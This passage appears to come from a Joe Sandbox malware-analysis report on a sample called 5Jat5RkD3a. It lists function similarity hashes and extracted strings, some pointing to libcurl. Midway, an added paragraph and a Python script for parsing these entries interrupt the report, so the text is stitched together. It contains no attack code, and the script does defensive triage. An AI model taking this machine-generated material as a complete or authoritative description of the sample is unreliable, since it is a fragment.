                                                              • Instruction Fuzzy Hash: 89D15A72A183658BD726DF28E88137EBBD1AF91304F15993DF8C997281DB349E44C782
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .$@$gfff$gfff
                                                              • API String ID: 0-2633265772
                                                              • Opcode ID: 8459d8207e057e620cf1d9af03855443049108a225ce8fe639410900789573df
                                                              • Instruction ID: 5319ec40e915cdb721538de18eb6332929532d702ea27aa7331853f37e0e7248
                                                              • Opcode Fuzzy Hash: 8459d8207e057e620cf1d9af03855443049108a225ce8fe639410900789573df
                                                              • Instruction Fuzzy Hash: FBD19D71A0430E8BDB14DE29C58432ABFE2BF84340F18893DEA599B355E778DD099792
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: %$&$urlapi.c
                                                              • API String ID: 0-3891957821
                                                              • Opcode ID: bfb8651388cc920b77ea6f32214e7e4d3fae3e8599cda142fdb0929cfa145699
                                                              • Instruction ID: 452c42ef480d02f1033e5555e36b50818f7a2e281aa68ec20f4cce2f784dfda5
                                                              • Opcode Fuzzy Hash: bfb8651388cc920b77ea6f32214e7e4d3fae3e8599cda142fdb0929cfa145699
                                                              • Instruction Fuzzy Hash: CA22BBB0A383425BEF204F208C5977B77D9DB91324F58452DEC8A462C2F679D978CB62
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $
                                                              • API String ID: 0-227171996
                                                              • Opcode ID: b543f8a406b71a407d775043ab1984cf5f1b85a4aa8ed632ae424308d3ebd84a
                                                              • Instruction ID: 6f96a506467451d9684a50af64e9da87cd107c804f12ff0c7dd151a45b12cb57
                                                              • Opcode Fuzzy Hash: b543f8a406b71a407d775043ab1984cf5f1b85a4aa8ed632ae424308d3ebd84a
                                                              • Instruction Fuzzy Hash: 53E232B1A483428FD318DF29C49875BFBE2BF88744F14891EE88597391E775E845CB82
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: -----END PUBLIC KEY-----$-----BEGIN PUBLIC KEY-----$vtls/vtls.c
                                                              • API String ID: 0-424504254
                                                              • Opcode ID: bb1d8b4547ecf6c9f423b9428f7630825bdbe9df3596416c295a34a8f52f71b9
                                                              • Instruction ID: 7a8790748b55559c11401c801a168475ae60258ea81154d9953e7ddd1c210054
                                                              • Opcode Fuzzy Hash: bb1d8b4547ecf6c9f423b9428f7630825bdbe9df3596416c295a34a8f52f71b9
                                                              • Instruction Fuzzy Hash: B1315672A283535BDB255D3C9C85B357A859FA1318F1C427CE8998B292EA698C20D3B1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                               • Associated: 00000000.00000002.1556781955.0000000000270000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1556804870.0000000000995000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1556804870.0000000000997000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558782224.000000000099A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000C32000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000C3B000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000D0F000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000D16000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559190219.0000000000D26000.00000080.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559336363.0000000000EDB000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559359660.0000000000EDC000.00000080.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559383699.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559406514.0000000000EDE000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: #$4
                                                              • API String ID: 0-353776824
                                                              • Opcode ID: b5546be7c1c243dff4b95d6b2c01e24eec01d108a010d46dbd3841c0d1fb90cb
                                                              • Instruction ID: 65d78ca653bcc7207c9b00e7206797bb9bc00b48ef5eb00871070516e7e5e4b5
                                                              • Opcode Fuzzy Hash: b5546be7c1c243dff4b95d6b2c01e24eec01d108a010d46dbd3841c0d1fb90cb
                                                              • Instruction Fuzzy Hash: BC22C0355087828FC318DF29C8806AAFBE5FF85314F148A2DE8DD97391D774A885CB92
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                               • Associated: 00000000.00000002.1556781955.0000000000270000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1556804870.0000000000995000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1556804870.0000000000997000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558782224.000000000099A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000C32000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000C3B000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000D0F000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000D16000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559190219.0000000000D26000.00000080.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559336363.0000000000EDB000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559359660.0000000000EDC000.00000080.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559383699.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559406514.0000000000EDE000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: #$4
                                                              • API String ID: 0-353776824
                                                              • Opcode ID: 8c6442ad21fd0c17796323fa4a97b6694f938926aff987d17d07e0839adae3a5
                                                              • Instruction ID: f85c6604dd24c127c51f0cc4475538e89a468999fe0ceeb220eaa9325eef832e
                                                              • Opcode Fuzzy Hash: 8c6442ad21fd0c17796323fa4a97b6694f938926aff987d17d07e0839adae3a5
                                                              • Instruction Fuzzy Hash: FB12F332A087418BC728CF19C4847AABBE5FFD4318F198A7DE9D957391D7709884CB86
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                               • Associated: 00000000.00000002.1556781955.0000000000270000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1556804870.0000000000995000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1556804870.0000000000997000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558782224.000000000099A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000C32000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000C3B000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000D0F000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000D16000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559190219.0000000000D26000.00000080.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559336363.0000000000EDB000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559359660.0000000000EDC000.00000080.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559383699.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559406514.0000000000EDE000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: H$xn--
                                                              • API String ID: 0-4022323365
                                                              • Opcode ID: 719bafd1108970b957a2ea81dc7c69e9329f1abda222c7531928105b6d5a72ba
                                                              • Instruction ID: cd987f993e2c8641cb5ccae3152fdd818f2bf6b7306141a9e119a4cf8950ba11
                                                              • Opcode Fuzzy Hash: 719bafd1108970b957a2ea81dc7c69e9329f1abda222c7531928105b6d5a72ba
                                                              • Instruction Fuzzy Hash: C1E117716087198BD718DE28D8C073BBBD2BBC4314F198A3DEA9687395E778DC458B42
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                               • Associated: 00000000.00000002.1556781955.0000000000270000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1556804870.0000000000995000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1556804870.0000000000997000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558782224.000000000099A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000C32000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000C3B000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000D0F000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000D16000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559190219.0000000000D26000.00000080.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559336363.0000000000EDB000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559359660.0000000000EDC000.00000080.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559383699.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559406514.0000000000EDE000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Downgrades to HTTP/1.1$multi.c
                                                              • API String ID: 0-3089350377
                                                              • Opcode ID: 0c17c868c0aed6920d9e7db5374bdbdcf74ac7e536e8f9eda72210b234db1c9e
                                                              • Instruction ID: 8bd20e155e0fe48598233c019d46ab78b62b8bce55ac7d46d241be043476b28e
                                                              • Opcode Fuzzy Hash: 0c17c868c0aed6920d9e7db5374bdbdcf74ac7e536e8f9eda72210b234db1c9e
                                                              • Instruction Fuzzy Hash: 92C12979A253029BD710BF24D88176AB7E4BF95304F04852DF948872D2E770E979CB82
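The Similarity entries above are machine-generated text, and the most useful signal in them for triage is the String ID field: vtls/vtls.c (in the entry carrying the PUBLIC KEY delimiters) and multi.c (in the "Downgrades to HTTP/1.1" entry) are libcurl source-file names, which tells an analyst that the sample carries a statically linked libcurl before any network capture is looked at. The Python below is an added example, not part of the Joe Sandbox report or of its tooling: it parses entries in this text layout into records, strips the "Download File" link text the HTML export leaves on the Associated lines, validates that Opcode/Instruction IDs are 64-hex-digit values, and collects which functions reference libcurl source files. The entry layout (one record per "Memory Dump Source" heading), the "$" separator between String IDs, and the set of libcurl file names are assumptions derived from what is visible on this page; the sample input is two entries copied from the report with the Associated lists shortened to one line each.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed input: two Similarity entries copied from the report above, with the
# Associated lists cut down to a single line each (the parser treats them identically).
SAMPLE_REPORT = """\
Strings
Memory Dump Source
• Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
• Associated: 00000000.00000002.1556781955.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
Similarity
• API ID:
• String ID: -----END PUBLIC KEY-----$-----BEGIN PUBLIC KEY-----$vtls/vtls.c
• API String ID: 0-424504254
• Opcode ID: bb1d8b4547ecf6c9f423b9428f7630825bdbe9df3596416c295a34a8f52f71b9
• Instruction ID: 7a8790748b55559c11401c801a168475ae60258ea81154d9953e7ddd1c210054
• Opcode Fuzzy Hash: bb1d8b4547ecf6c9f423b9428f7630825bdbe9df3596416c295a34a8f52f71b9
• Instruction Fuzzy Hash: B1315672A283535BDB255D3C9C85B357A859FA1318F1C427CE8998B292EA698C20D3B1
Strings
Memory Dump Source
• Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
• Associated: 00000000.00000002.1556781955.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
Similarity
• API ID:
• String ID: Downgrades to HTTP/1.1$multi.c
• API String ID: 0-3089350377
• Opcode ID: 0c17c868c0aed6920d9e7db5374bdbdcf74ac7e536e8f9eda72210b234db1c9e
• Instruction ID: 8bd20e155e0fe48598233c019d46ab78b62b8bce55ac7d46d241be043476b28e
• Opcode Fuzzy Hash: 0c17c868c0aed6920d9e7db5374bdbdcf74ac7e536e8f9eda72210b234db1c9e
• Instruction Fuzzy Hash: 92C12979A253029BD710BF24D88176AB7E4BF95304F04852DF948872D2E770E979CB82
"""

# libcurl source-file names that appear verbatim in its info/debug strings.
# Assumed minimal set for this example; extend it for other statically linked libraries.
LIBCURL_SOURCE_FILES = {
    "vtls/vtls.c", "multi.c", "url.c", "http.c", "easy.c",
    "transfer.c", "sendf.c", "connect.c", "cookie.c", "hostip.c",
}

# Opcode ID / Instruction ID are 64 lowercase hex digits in every entry on the page.
HEX64 = re.compile(r"^[0-9a-f]{64}$")


@dataclass
class SimilarityEntry:
    source_file: str = ""
    offset: str = ""
    based_on_pe: bool = False
    associated: List[str] = field(default_factory=list)
    snapshot_file: str = ""
    api_ids: List[str] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)
    api_string_id: str = ""
    opcode_id: str = ""
    instruction_id: str = ""
    opcode_fuzzy_hash: str = ""
    instruction_fuzzy_hash: str = ""

    def libcurl_markers(self) -> List[str]:
        """String IDs of this function that are libcurl source-file names."""
        return [s for s in self.strings if s in LIBCURL_SOURCE_FILES]

    def ids_well_formed(self) -> bool:
        """Both function identifiers look like SHA-256 hex digests."""
        return all(HEX64.match(h) for h in (self.opcode_id, self.instruction_id))


def _split_ids(value: str) -> List[str]:
    # Joe Sandbox joins multiple IDs/strings with '$' (assumption: a string that
    # itself contains '$' would be split too); an empty field yields [].
    return [s for s in value.split("$") if s] if value else []


def parse_similarity_entries(text: str) -> List[SimilarityEntry]:
    """Parse the bullet-list text layout of the report into one record per entry."""
    entries: List[SimilarityEntry] = []
    cur: Optional[SimilarityEntry] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":          # each entry starts here
            cur = SimilarityEntry()
            entries.append(cur)
            continue
        if cur is None or not line.startswith("•"):
            continue
        body = line.lstrip("• ").strip()
        # Strip the "Download File" link text the HTML export leaves on Associated lines.
        if body.endswith("Download File"):
            body = body[: -len("Download File")].rstrip()
        key, _, value = body.partition(":")
        key, value = key.strip(), value.strip()
        if key == "Source File":
            # "<dump>.sdmp, Offset: 00270000, based on PE: true"
            parts = [p.strip() for p in value.split(",")]
            cur.source_file = parts[0]
            for p in parts[1:]:
                k, _, v = p.partition(":")
                if k.strip() == "Offset":
                    cur.offset = v.strip()
                elif k.strip() == "based on PE":
                    cur.based_on_pe = v.strip().lower() == "true"
        elif key == "Associated":
            cur.associated.append(value)
        elif key == "Snapshot File":
            cur.snapshot_file = value
        elif key == "API ID":
            cur.api_ids = _split_ids(value)
        elif key == "String ID":
            cur.strings = _split_ids(value)
        elif key == "API String ID":
            cur.api_string_id = value
        elif key == "Opcode ID":
            cur.opcode_id = value
        elif key == "Instruction ID":
            cur.instruction_id = value
        elif key == "Opcode Fuzzy Hash":
            cur.opcode_fuzzy_hash = value
        elif key == "Instruction Fuzzy Hash":
            cur.instruction_fuzzy_hash = value
    return entries


def libcurl_evidence(entries: List[SimilarityEntry]) -> Dict[str, List[str]]:
    """Map each libcurl source-file marker to the Opcode IDs of functions referencing it."""
    hits: Dict[str, List[str]] = {}
    for e in entries:
        for marker in e.libcurl_markers():
            hits.setdefault(marker, []).append(e.opcode_id)
    return hits


if __name__ == "__main__":
    parsed = parse_similarity_entries(SAMPLE_REPORT)
    for marker, ids in libcurl_evidence(parsed).items():
        print(f"{marker}: {len(ids)} function(s), e.g. opcode {ids[0][:16]}...")
```

Feeding the whole Similarity section of the report through parse_similarity_entries gives one record per function; libcurl_evidence then lists which functions carry libcurl file names, which is enough to justify diffing the binary against a known libcurl build before spending reverse-engineering time on those functions.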
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                               • Associated: 00000000.00000002.1556781955.0000000000270000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1556804870.0000000000995000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1556804870.0000000000997000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558782224.000000000099A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000C32000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000C3B000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000D0F000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000D16000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559190219.0000000000D26000.00000080.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559336363.0000000000EDB000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559359660.0000000000EDC000.00000080.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559383699.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559406514.0000000000EDE000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: M 0.$NT L
                                                              • API String ID: 0-1807112707
                                                              • Opcode ID: ee061998f025f2e5dc14bce87e8132597466387d60aa7935bc2878a91fab57c7
                                                              • Instruction ID: 6f32e33f2592ebd7349daea9d7994aa4830f9466a029b55c28ff7b4093abb30c
                                                              • Opcode Fuzzy Hash: ee061998f025f2e5dc14bce87e8132597466387d60aa7935bc2878a91fab57c7
                                                              • Instruction Fuzzy Hash: 9F51F8746203419BEB11CF20C984B9AB7F4BF49304F14856AEC485F342D775DEA4CB96
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                               • Associated: 00000000.00000002.1556781955.0000000000270000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1556804870.0000000000995000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1556804870.0000000000997000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558782224.000000000099A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000C32000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000C3B000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000D0F000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000D16000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559190219.0000000000D26000.00000080.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559336363.0000000000EDB000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559359660.0000000000EDC000.00000080.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559383699.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559406514.0000000000EDE000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: M-
                                                              • API String ID: 0-3829004705
                                                              • Opcode ID: d9e1dffb9c167f2a1bfd412aa57ca9546c7a865265bd6293c312d3add4af8ce4
                                                              • Instruction ID: bd1345f3f468d1dcc4ae8bce683ba5bdfeab0f598b3c3337e430f8037cb097cd
                                                              • Opcode Fuzzy Hash: d9e1dffb9c167f2a1bfd412aa57ca9546c7a865265bd6293c312d3add4af8ce4
                                                              • Instruction Fuzzy Hash: 4D2264735417044BE318CF2FCC81582B3E3AFD822475F857EC926CB696EEB9A61B4548
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                               • Associated: 00000000.00000002.1556781955.0000000000270000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1556804870.0000000000995000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1556804870.0000000000997000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558782224.000000000099A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000C32000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000C3B000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000D0F000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000D16000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559190219.0000000000D26000.00000080.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559336363.0000000000EDB000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559359660.0000000000EDC000.00000080.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559383699.0000000000EDD000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559406514.0000000000EDE000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: D
                                                              • API String ID: 0-2746444292
                                                              • Opcode ID: abc93120844dcb078d04df584af388602c4da3052e158adea212c8b27998d9d7
                                                              • Instruction ID: 5736c21850806a753d38cb517d3cbeec2fe79e0775c03b0a6bb11e1e6bc1d6be
                                                              • Opcode Fuzzy Hash: abc93120844dcb078d04df584af388602c4da3052e158adea212c8b27998d9d7
                                                              • Instruction Fuzzy Hash: A0326B7190C3858BC725DF28D4806AEFBE1BFD9304F158A6EE9D953351EB30A945CB82
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                               • Associated: 00000000.00000002.1556781955.0000000000270000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1556804870.0000000000995000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1556804870.0000000000997000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558782224.000000000099A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000B28000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000C32000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000C3B000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000D0F000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000D16000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1558804548.0000000000D25000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1559190219.0000000000D26000.00000080.00000001.01000000.00000003.sdmp
